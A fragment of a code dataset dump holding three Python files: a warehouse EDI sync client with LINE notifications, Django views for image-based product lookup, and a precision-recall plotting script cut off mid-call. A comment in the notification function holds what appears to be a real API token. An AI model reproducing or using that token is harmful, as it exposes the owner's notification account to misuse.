\"\")).replace(\"'\", \"\")\n\n def __pono(self, txt):\n return str(self.__re_partname(txt)).strip()\n \n def line_notification(self, msg):\n url = \"https://notify-api.line.me/api/notify\"\n payload = f\"message={msg}\"\n headers = {\n \"Authorization\": f\"Bearer {os.getenv('LINE_NOTIFICATION_TOKEN')}\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n }\n\n # BugDWScwhYvjVc5EyRi5sa28LmJxE2G5NIJsrs6vEV7\n\n response = requests.request(\n \"POST\", url, headers=headers, data=payload.encode(\"utf-8\")\n )\n\n print(f\"line status => {response}\")\n if response.status_code == 200:return True\n return False\n\n def login(self):\n try:\n url = f\"{self.host}/login\"\n payload = f'empcode={self.username}&password={self.password}'\n headers = {\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n if response.status_code == 200:\n obj = response.json()\n LogActivity(name='SPL',subject=\"LOGIN\", status='Success', message=f\"Token is {obj['token']}\")\n return obj['token']\n \n except Exception as ex:\n LogActivity(name='SPL',subject=\"LOGIN\", status='Error', message=str(ex))\n pass\n\n return None\n\n def logout(self, token):\n try:\n url = f\"{self.host}/logout\"\n payload = {}\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n LogActivity(name='SPL',subject=\"LOGOUT\", status='Success', message=f\"Logoff By {token}\")\n return True\n \n except Exception as ex:\n LogActivity(name='SPL',subject=\"LOGOUT\", status='Error', message=str(ex))\n pass\n\n return False\n \n def upload(self, whsId, typeName, batchId, filepath, filename, token):\n try:\n url = f\"{self.host}/gedi/store\"\n payload={\n 'filename': filename,\n 'whs_id': whsId,\n 
'file_type': typeName,\n 'batch_id': batchId\n }\n files=[\n ('file',(filename,open(filepath,'rb'),'application/octet-stream'))\n ]\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload, files=files)\n # print(response.text)\n if response.status_code == 200:\n LogActivity(name='SPL', subject=\"UPLOAD\", status='Success',message=f\"Upload GEDI({filename})\")\n return True\n \n except Exception as ex:\n LogActivity(name='SPL', subject=\"UPLOAD\", status='Error',message=str(ex))\n pass\n \n return False\n \n def get_link(self, token, status=0):\n url = f\"{self.host}/gedi/get/{status}\"\n payload={}\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n obj = response.json()\n return obj['data']\n \n return False\n \n def header_receive(self, fileNamme):\n fac = fileNamme[fileNamme.find(\"SPL\") - 2 : fileNamme.find(\"SPL\") - 1]\n plantype = \"RECEIVE\"\n cd = 20\n unit = \"BOX\"\n recisstype = \"01\"\n factory = \"INJ\"\n if fac != \"5\":\n factory = \"AW\"\n plantype = \"RECEIVE\"\n cd = 10\n unit = \"COIL\"\n recisstype = \"01\"\n \n return {\n \"plantype\": plantype,\n \"cd\": cd,\n \"unit\": unit,\n \"recisstype\": recisstype,\n \"factory\": factory,\n }\n \n def read_receive(self, obj, line):\n cd = obj['cd']\n unit = obj['unit']\n recisstype = obj['recisstype']\n plantype = obj['plantype']\n factory = obj['factory']\n return {\n \"factory\": factory,\n \"faczone\": str(line[4 : (4 + 3)]).lstrip().rstrip(),\n \"receivingkey\": str(line[4 : (4 + 12)]).lstrip().rstrip(),\n \"partno\": str(line[76 : (76 + 25)]).lstrip().rstrip(),\n \"partname\": str(line[101 : (101 + 25)]).lstrip().rstrip(),\n \"vendor\": factory,\n \"cd\": cd,\n \"unit\": unit,\n \"whs\": factory,\n \"tagrp\": \"C\",\n \"recisstype\": recisstype,\n \"plantype\": plantype,\n \"recid\": str(line[0:4]).lstrip().rstrip(),\n \"aetono\": str(line[4 : (4 + 12)]).lstrip().rstrip(),\n \"aetodt\": str(line[16 : (16 + 10)]).lstrip().rstrip(),\n \"aetctn\": float(str(line[26 : (26 + 9)]).lstrip().rstrip()),\n \"aetfob\": float(str(line[35 : (35 + 9)]).lstrip().rstrip()),\n \"aenewt\": float(str(line[44 : (44 + 11)]).lstrip().rstrip()),\n \"aentun\": str(line[55 : (55 + 5)]).lstrip().rstrip(),\n \"aegrwt\": float(str(line[60 : (60 + 11)]).lstrip().rstrip()),\n \"aegwun\": str(line[71 : (71 + 5)]).lstrip().rstrip(),\n \"aeypat\": str(line[76 : (76 + 25)]).lstrip().rstrip(),\n \"aeedes\": str(\n self.__check_partname(\n factory, self.__re_partname(line[101 : (101 + 25)])\n )\n ),\n \"aetdes\": str(\n self.__check_partname(\n factory, self.__re_partname(line[101 : (101 + 25)])\n )\n ),\n \"aetarf\": float(str(line[151 : (151 + 10)]).lstrip().rstrip()),\n \"aestat\": float(str(line[161 : (161 + 10)]).lstrip().rstrip()),\n \"aebrnd\": float(str(line[171 : (171 + 10)]).lstrip().rstrip()),\n \"aertnt\": float(str(line[181 : (181 + 5)]).lstrip().rstrip()),\n \"aetrty\": float(str(line[186 : (186 + 5)]).lstrip().rstrip()),\n \"aesppm\": float(str(line[191 : (191 + 5)]).lstrip().rstrip()),\n \"aeqty1\": float(str(line[196 : (196 + 9)]).lstrip().rstrip()),\n \"aeqty2\": float(str(line[205 : (205 + 9)]).lstrip().rstrip()),\n \"aeuntp\": float(str(line[214 : (214 + 9)]).lstrip().rstrip()),\n \"aeamot\": float(str(line[223 : (223 + 11)]).lstrip().rstrip()),\n \"plnctn\": float(str(line[26 : (26 + 9)]).lstrip().rstrip()),\n \"plnqty\": float(str(line[196 : 
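# Illustrative sketch (not part of the dataset record above): read_receive()
# slices a fixed-width GEDI record with hard-coded offsets such as
# line[76:(76 + 25)]. A field table keeps the same logic in one place; the
# offsets below are a made-up subset of the layout, chosen only for the demo.
FIELDS = [
    ("recid", 0, 4),          # (name, start, length) -- assumed layout
    ("receivingkey", 4, 12),
    ("partno", 76, 25),
    ("partname", 101, 25),
]

def parse_fixed_width(line: str) -> dict:
    return {name: line[start:start + length].strip()
            for name, start, length in FIELDS}

demo = "HEAD" + "K123456789AB".ljust(72) + "PART-NO-1".ljust(25) + "PART NAME".ljust(25)
record = parse_fixed_width(demo)
print(record["partno"])  # -> PART-NO-1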
(196 + 9)]).lstrip().rstrip()),\n \"minimum\": 0,\n \"maximum\": 0,\n \"picshelfbin\": \"PNON\",\n \"stkshelfbin\": \"SNON\",\n \"ovsshelfbin\": \"ONON\",\n \"picshelfbasicqty\": 0,\n \"outerpcs\": 0,\n \"allocateqty\": 0,\n \"sync\": False,\n \"updatedon\": datetime.now(),\n }\n\n def header_orderplan(self, fileName):\n fac = fileName[fileName.find(\"SPL\") - 2 : fileName.find(\"SPL\") - 1]\n plantype = \"ORDERPLAN\"\n cd = 20\n unit = \"BOX\"\n sortg1 = \"PARTTYPE\"\n sortg2 = \"PARTNO\"\n sortg3 = \"\"\n factory = \"INJ\"\n \n if fac != \"5\":\n factory = \"AW\"\n plantype = \"ORDERPLAN\"\n cd = 10\n unit = \"COIL\"\n sortg1 = \"PONO\"\n sortg2 = \"PARTTYPE\"\n sortg3 = \"PARTNO\"\n \n return {\n 'factory': factory,\n 'plantype': plantype,\n 'cd': cd,\n 'unit': unit,\n 'sortg1': sortg1,\n 'sortg2': sortg2,\n 'sortg3': sortg3,\n } \n \n def read_orderplan(self, obj, line):\n plantype = obj['plantype']\n cd = obj['cd']\n unit = obj['unit']\n sortg1 = obj['sortg1']\n sortg2 = obj['sortg2']\n sortg3 = obj['sortg3']\n factory = obj['factory']\n oqty = str(self.__trim_txt(line[89 : (89 + 9)]))\n if oqty == \"\":\n oqty = 0\n\n return {\n \"vendor\": factory,\n \"cd\": cd,\n \"unit\": unit,\n \"whs\": factory,\n \"tagrp\": \"C\",\n \"factory\": factory,\n \"sortg1\": sortg1,\n \"sortg2\": sortg2,\n \"sortg3\": sortg3,\n \"plantype\": plantype,\n \"orderid\": str(self.__trim_txt(line[13 : (13 + 15)])),\n # remove space\n \"pono\": str(self.__pono(line[13 : (13 + 15)])),\n \"recid\": str(self.__trim_txt(line[0:4])),\n \"biac\": str(self.__trim_txt(line[5 : (5 + 8)])),\n \"shiptype\": str(self.__trim_txt(line[4 : (4 + 1)])),\n \"etdtap\": datetime.strptime(\n str(self.__trim_txt(line[28 : (28 + 8)])), \"%Y%m%d\"\n ),\n \"partno\": str(self.__trim_txt(line[36 : (36 + 25)])),\n \"partname\": str(\n self.__check_partname(\n factory,\n self.__pono(line[61 : (61 + 25)]),\n )\n ),\n \"pc\": str(self.__trim_txt(line[86 : (86 + 1)])),\n \"commercial\": str(self.__trim_txt(line[87 : (87 + 1)])),\n \"sampleflg\": str(self.__trim_txt(line[88 : (88 + 1)])),\n \"orderorgi\": int(oqty),\n \"orderround\": int(str(self.__trim_txt(line[98 : (98 + 9)]))),\n \"firmflg\": str(self.__trim_txt(line[107 : (107 + 1)])),\n \"shippedflg\": str(self.__trim_txt(line[108 : (108 + 1)])),\n \"shippedqty\": float(str(self.__trim_txt(line[109 : (109 + 9)]))),\n \"ordermonth\": datetime.strptime(\n str(self.__trim_txt(line[118 : (118 + 8)])), \"%Y%m%d\"\n ),\n \"balqty\": float(str(self.__trim_txt(line[126 : (126 + 9)]))),\n \"bidrfl\": str(self.__trim_txt(line[135 : (135 + 1)])),\n \"deleteflg\": str(self.__trim_txt(line[136 : (136 + 1)])),\n \"ordertype\": str(self.__trim_txt(line[137 : (137 + 1)])),\n \"reasoncd\": str(self.__trim_txt(line[138 : (138 + 3)])),\n \"upddte\": datetime.strptime(\n str(self.__trim_txt(line[141 : (141 + 14)])), \"%Y%m%d%H%M%S\"\n ),\n \"updtime\": datetime.strptime(\n str(self.__trim_txt(line[141 : (141 + 14)])), \"%Y%m%d%H%M%S\"\n ),\n \"carriercode\": str(self.__trim_txt(line[155 : (155 + 4)])),\n \"bioabt\": int(str(self.__trim_txt(line[159 : (159 + 1)]))),\n \"bicomd\": str(self.__trim_txt(line[160 : (160 + 1)])),\n \"bistdp\": float(str(self.__trim_txt(line[165 : (165 + 9)]))),\n \"binewt\": float(str(self.__trim_txt(line[174 : (174 + 9)]))),\n \"bigrwt\": float(str(self.__trim_txt(line[183 : (183 + 9)]))),\n \"bishpc\": str(self.__trim_txt(line[192 : (192 + 8)])),\n \"biivpx\": str(self.__trim_txt(line[200 : (200 + 2)])),\n \"bisafn\": str(self.__trim_txt(line[202 : (202 + 6)])),\n \"biwidt\": 
float(str(self.__trim_txt(line[212 : (212 + 4)]))),\n \"bihigh\": float(str(self.__trim_txt(line[216 : (216 + 4)]))),\n \"bileng\": float(str(self.__trim_txt(line[208 : (208 + 4)]))),\n \"lotno\": str(self.__trim_txt(line[220 : (220 + 8)])),\n \"minimum\": 0,\n \"maximum\": 0,\n \"picshelfbin\": \"PNON\",\n \"stkshelfbin\": \"SNON\",\n \"ovsshelfbin\": \"ONON\",\n \"picshelfbasicqty\": 0,\n \"outerpcs\": 0,\n \"allocateqty\": 0,\n \"sync\": False,\n \"updatedon\": datetime.strptime(\n str(self.__trim_txt(line[141 : (141 + 14)])), \"%Y%m%d%H%M%S\"\n ),\n }\n \n def get_file(self, name, fileName):\n is_success = True\n try:\n url = f\"{str(self.host).replace('/api/v1', '')}{fileName}\"\n payload={}\n headers = {}\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n \n ### create temp file\n f = open(name, mode='w+', encoding='utf-8')\n f.write(str(response.text).replace('\\n', ''))\n f.close()\n \n return name\n \n except Exception as ex:\n pass\n \n \n return is_success\n \n def update_status(self, token, batchId, status=0):\n url = f\"{self.host}/gedi/update/{batchId}\"\n payload=f'is_downloaded={status}&is_active=1'\n headers = {\n 'Authorization': f'Bearer {token}',\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n\n response = requests.request(\"PUT\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n return True\n \n return False\n \n def get_receive(self, token, status=0):\n url = f\"{self.host}/receive/header/index/{status}\"\n payload={}\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n if response.status_code != 200:return False\n data = response.json()\n return data['data']\n \n def update_receive_ent(self, token, receive_id, is_sync=0, status=1):\n url = f\"{self.host}/receive/header/update/{receive_id}\"\n payload=f'receive_sync={is_sync}&active={status}'\n headers = {\n 'Authorization': f'Bearer {token}',\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n response = requests.request(\"PUT\", url, headers=headers, data=payload)\n if response.status_code != 200:return False\n data = response.json()\n return data['data']\n \n def get_receive_body(self, token, receive_id, status=1):\n url = f\"{self.host}/receive/body/index/{status}/{receive_id}\"\n payload={}\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n if response.status_code != 200:\n return False\n \n data = response.json()\n return data['data']\n \n\n def get_order_plan(self, token, limit=100, is_sync=0, status=1):\n url = f\"{self.host}/order/plan/index/{status}/{is_sync}/{limit}\"\n payload={}\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n if response.status_code != 200:\n return False\n \n data = response.json()\n return data['data']\n \n async def serial_no_tracking(self, token=None, obj=[]):\n async with aiohttp.ClientSession() as session:\n url = f\"{self.host}/trigger/store\"\n payload = json.dumps(obj)\n \n print(obj)\n \n headers = {\n 'Content-Type': 'application/json'\n }\n async with session.post(url, headers=headers, data=payload) as res:\n pokemon = await res.json()\n print(pokemon)\n # requests.request(\"POST\", url, headers=headers, data=payload)\n \n return True\n \n def update_receive_trigger(self, obj):\n # print(obj['serial_no'])\n try:\n url = f\"{self.host}/trigger/receive\"\n payload = 
json.dumps({\n \"receive_no\": obj[\"receive_no\"],\n \"part_no\": obj[\"part_no\"],\n \"lot_no\": obj[\"lot_no\"],\n \"serial_no\": obj[\"serial_no\"],\n \"case_id\": obj[\"case_id\"],\n \"std_pack_qty\": obj[\"std_pack_qty\"],\n \"shelve\": obj[\"shelve\"],\n \"pallet_no\": obj[\"pallet_no\"],\n \"transfer_out\": obj[\"transfer_out\"],\n \"event_trigger\": obj[\"event_trigger\"]\n })\n \n headers = {\n 'Content-Type': 'application/json'\n }\n requests.request(\"POST\", url, headers=headers, data=payload)\n \n except Exception as ex:\n LogActivity(name='SPL', subject=\"SERIAL TRACKING\", status='Error',message=str(ex))\n pass\n \n return True", "repo_name": "abe27/sync_ck_cloud", "sub_path": "spllibs.py", "file_name": "spllibs.py", "file_ext": "py", "file_size_in_byte": 29331, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "name"}, {"api_name": "shareplum.Office365", "line_number": 34, "usage_type": "call"}, {"api_name": "shareplum.Site", "line_number": 35, "usage_type": "call"}, {"api_name": "shareplum.site.Version.v365", "line_number": 35, "usage_type": "attribute"}, {"api_name": "shareplum.site.Version", "line_number": 35, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 115, "usage_type": "name"}, {"api_name": "urllib.parse.quote", "line_number": 139, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 139, "usage_type": "attribute"}, {"api_name": "urllib3.disable_warnings", "line_number": 144, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 145, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 149, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 172, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 182, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 202, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 202, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 202, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 210, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 220, "usage_type": "call"}, {"api_name": "{'datetime': 'datetime.datetime'}", "line_number": 236, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 253, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 268, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 270, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 277, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 299, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 301, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 308, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 330, "usage_type": "call"}, {"api_name": 
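# Illustrative sketch (not part of the dataset record above):
# serial_no_tracking() posts JSON through aiohttp inside nested async context
# managers; this is the same pattern reduced to a runnable minimum. The URL
# is a public echo service, not the record's endpoint.
import asyncio
import aiohttp

async def post_json(url: str, payload: dict) -> dict:
    async with aiohttp.ClientSession() as session:
        async with session.post(url, json=payload) as resp:
            resp.raise_for_status()
            return await resp.json()

if __name__ == "__main__":
    body = asyncio.run(post_json("https://httpbin.org/post", {"serial_no": "S-001"}))
    print(body["json"])  # httpbin echoes the posted payload back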
"urllib.parse", "line_number": 330, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 368, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 374, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 389, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 409, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 437, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 456, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 546, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 546, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 607, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 607, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 625, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 625, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 633, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 633, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 636, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 636, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 661, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 661, "usage_type": "name"}, {"api_name": "requests.request", "line_number": 672, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 695, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 708, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 720, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 731, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 746, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 755, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 757, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 775, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 791, "usage_type": "call"}]} +{"seq_id": "28980162239", "text": "\n\nfrom urllib import response\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport numpy as np\nfrom werkzeug.utils import secure_filename\n\n\n# from django.core.files import default_storage\nfrom . import Operations\nimport cv2\nimport json\n# Create your views here.\n\n# Method to handle request for Retreiving the details of the scanned dendrite image. 
\ndef post1(request):\n handler = Operations.Operations()\n print(\"Scan called\")\n\n if request.method == 'POST':\n if request.FILES['file']:\n file = request.FILES['file']\n else:\n msg = \"No file sent\"\n return HttpResponse(json.dumps(msg))\n \n if file:\n \n image = cv2.imdecode(np.frombuffer(file.read(), np.uint8), cv2.IMREAD_UNCHANGED)\n image = cv2.rotate(image,rotateCode=cv2.ROTATE_90_CLOCKWISE)\n resizeDIm = (int(image.shape[1]*20/100),int(image.shape[0]*20/100))\n image = cv2.resize(image,resizeDIm,interpolation=cv2.INTER_AREA)\n image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n # cv2.imshow(\" \",image)\n # cv2.waitKey(0)\n # file_name = default_storage.save(filename,file)\n \n# finding the image stored in database and retreiving the details of the image\n check = handler.image_Compare(image)\n if check != \"No Match\":\n data = handler.select_match(check[1])\n msg = {\"Match\":\"1\", \n \"prodID\": str(data[0]),\n \"brand\":str(data[1]),\n \"disc\":str(data[2]),\n \"cat\":str(data[3]),\n \"mfg\": str(data[4]),\n \"exp\": str(data[5])\n }\n return HttpResponse(json.dumps(msg))\n else:\n print(\"No match found\")\n msg = {\"Match\":\"-1\"}\n return HttpResponse(json.dumps(msg))\n\n# Method to handle request to register the captured dendrite image on database\ndef post2(request):\n print(\"Register called\")\n handler = Operations.Operations()\n if request.method == 'POST':\n if request.FILES['file']:\n \n file = request.FILES['file']\n else:\n msg = \"No file sent\"\n \n return HttpResponse(json.dumps(msg))\n brand = request.POST.get(\"brnd\")\n disc = request.POST.get(\"disc\")\n cat = request.POST.get(\"cat\")\n mfg = request.POST.get(\"mfgdate\")\n exp = request.POST.get(\"expdate\")\n \n if file:\n # flname = secure_filename(file.filename)\n \n image = cv2.imdecode(np.frombuffer(file.read(), np.uint8), cv2.IMREAD_UNCHANGED)\n image = cv2.rotate(image,rotateCode=cv2.ROTATE_90_CLOCKWISE)\n resizeDIm = (int(image.shape[1]*20/100),int(image.shape[0]*20/100))\n image = cv2.resize(image,resizeDIm,interpolation=cv2.INTER_AREA)\n image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n \n # file_name = default_storage.save(filename,file)\n\n hashofImg = handler.hash_function(image)\n img = handler.encode_img(image)\n task = (hashofImg,img,brand,disc,cat,mfg,exp)\n# checks if the captured image exists in database \n check = handler.image_Compare(image)\n if (check == \"No Match\"):\n handler.insert_row(task)\n print(\"No Match found\")\n msg = {\"Match\":\"2\"}\n return HttpResponse(json.dumps(msg))\n else:\n print(\"Match Found\")\n msg = {\"Match\":\"-1\"}\n return HttpResponse(json.dumps(msg))\n\n# method to handle the request to update the details of the stored dendrite \ndef post3(request):\n print(\"Update Called\")\n handler = Operations.Operations()\n if request.method == \"POST\":\n\n id = request.POST.get(\"id\")\n brand = request.POST.get(\"brnd\")\n disc = request.POST.get(\"disc\")\n cat = request.POST.get(\"cat\")\n mfg = request.POST.get(\"mfgdate\")\n exp = request.POST.get(\"expdate\")\n task=[id,brand,disc,cat,mfg,exp]\n# method to update record in database \n handler.update_info(task)\n print(\"Record Updated\")\n# method to retreive the updated record.\n data = handler.select_match(id)\n print(data[4]+\" \"+data[5])\n msg = {\"Match\":\"3\", \n \"prodID\": str(data[0]),\n \"brand\":str(data[1]),\n \"disc\":str(data[2]),\n \"cat\":str(data[3]),\n \"mfg\": str(data[4]),\n \"exp\": str(data[5])\n }\n return HttpResponse(json.dumps(msg))\n\n \n", "repo_name": 
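# Illustrative sketch (not part of the dataset record above): the Django
# views it annotates decode an upload with cv2.imdecode and compare images by
# hash via a handler class whose internals are not shown. This reproduces the
# decode step and one *possible* hash_function -- a simple average hash; the
# record's actual algorithm is unknown, so treat this as an assumption.
import cv2
import numpy as np

def average_hash(buf: bytes, hash_size: int = 8) -> int:
    img = cv2.imdecode(np.frombuffer(buf, np.uint8), cv2.IMREAD_GRAYSCALE)
    small = cv2.resize(img, (hash_size, hash_size), interpolation=cv2.INTER_AREA)
    bits = (small > small.mean()).flatten()
    return int("".join("1" if b else "0" for b in bits), 2)

def hamming(h1: int, h2: int) -> int:
    # Small distances between hashes suggest visually similar images.
    return bin(h1 ^ h2).count("1")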
"AsatiHimanshu/densecServerDemo", "sub_path": "densecID/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.http.HttpResponse", "line_number": 26, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.imdecode", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_UNCHANGED", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.rotate", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_CLOCKWISE", "line_number": 31, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 33, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.http.HttpResponse", "line_number": 51, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 51, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 68, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.imdecode", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 78, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_UNCHANGED", "line_number": 78, "usage_type": "attribute"}, {"api_name": "cv2.rotate", "line_number": 79, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_CLOCKWISE", "line_number": 79, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 81, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 82, "usage_type": "attribute"}, {"api_name": "django.http.HttpResponse", "line_number": 95, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 95, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 99, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 99, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 128, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "27875981708", "text": "from __future__ import annotations\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tqdm.auto import tqdm\n\nfrom ..utils import build_gt_id2annotations\nfrom ..utils import build_pr_id2annotations\nfrom ..utils import COLORS\nfrom ..utils import load_json_from_file\nfrom ..utils import transform_gt_into_pr\nfrom ..utils import update_scores\nfrom .count_stats import init_stats\nfrom .count_stats import update_stats\n\n\ndef count_point(gt_ann, pr_ann, score_thres, weighted):\n gt = load_json_from_file(gt_ann)\n pr = load_json_from_file(pr_ann)\n\n pr = update_scores(pr, score_thres)\n\n categories = gt['categories']\n\n stats = init_stats(gt, 
categories)\n\n gt_id_to_annotation = build_gt_id2annotations(gt)\n pr_id_to_annotation = build_pr_id2annotations(pr)\n\n stats = update_stats(\n stats, gt_id_to_annotation, pr_id_to_annotation,\n categories, weighted,\n )\n\n return stats\n\n\ndef calc_scores(stats, precision, recall):\n for category_id in stats:\n tp = stats[category_id]['TP']\n fp = stats[category_id]['FP']\n fn = stats[category_id]['FN']\n\n prec = tp / (tp + fp + 1e-7)\n rec = tp / (tp + fn + 1e-7)\n\n if precision.get(category_id, None) is None:\n precision[category_id] = []\n precision[category_id].append(prec)\n\n if recall.get(category_id, None) is None:\n recall[category_id] = []\n recall[category_id].append(rec)\n\n return precision, recall\n\n\ndef generate_count_curve(\n gt_ann,\n pr_ann,\n weighted=False,\n n_sample_points=50,\n plot_title='Count curve',\n plot_output_path='counts.png',\n test_ann=None,\n bounds=None,\n):\n precision = {}\n recall = {}\n\n for score_thres in tqdm(\n np.linspace(0.0, 1.0, n_sample_points, endpoint=False),\n ):\n stats = count_point(gt_ann, pr_ann, score_thres, weighted)\n precision, recall = calc_scores(stats, precision, recall)\n\n if plot_title:\n fig, ax = plt.subplots(figsize=[27, 18])\n ins = ax.inset_axes([0.05, 0.05, 0.45, 0.4])\n ins.set_xticks(\n [.7, .75, .8, .85, .9, .95],\n [.7, .75, .8, .85, .9, .95], fontsize=30,\n )\n ins.yaxis.tick_right()\n ins.xaxis.tick_top()\n if bounds is not None:\n _, x_max, _, _ = bounds\n ins.set_xlim([.8, x_max])\n else:\n ins.set_xlim([.8, 1.0])\n\n for category_id in precision:\n prec = precision[category_id]\n rec = recall[category_id]\n if plot_title:\n ax.plot(\n rec,\n prec,\n 'x--',\n label='AI ' + stats[category_id]['name'],\n )\n ins.plot(\n rec,\n prec,\n 'x--',\n label='AI ' + stats[category_id]['name'],\n )\n\n if test_ann is not None:\n for t_ann, c in zip(test_ann, COLORS):\n t_ann, label = t_ann\n t_pr = transform_gt_into_pr(t_ann, gt_ann)\n stats = count_point(gt_ann, t_pr, .5, weighted)\n _precision, _recall = calc_scores(stats, {}, {})\n if plot_title:\n ax.plot(\n _recall[category_id][0],\n _precision[category_id][0],\n 'D',\n markersize=15,\n markeredgewidth=3,\n label=label +\n f' (R = {np.round(_recall[category_id][0], 3)})',\n c=c,\n )\n ins.plot(\n _recall[category_id][0],\n _precision[category_id][0],\n 'D',\n markersize=12,\n 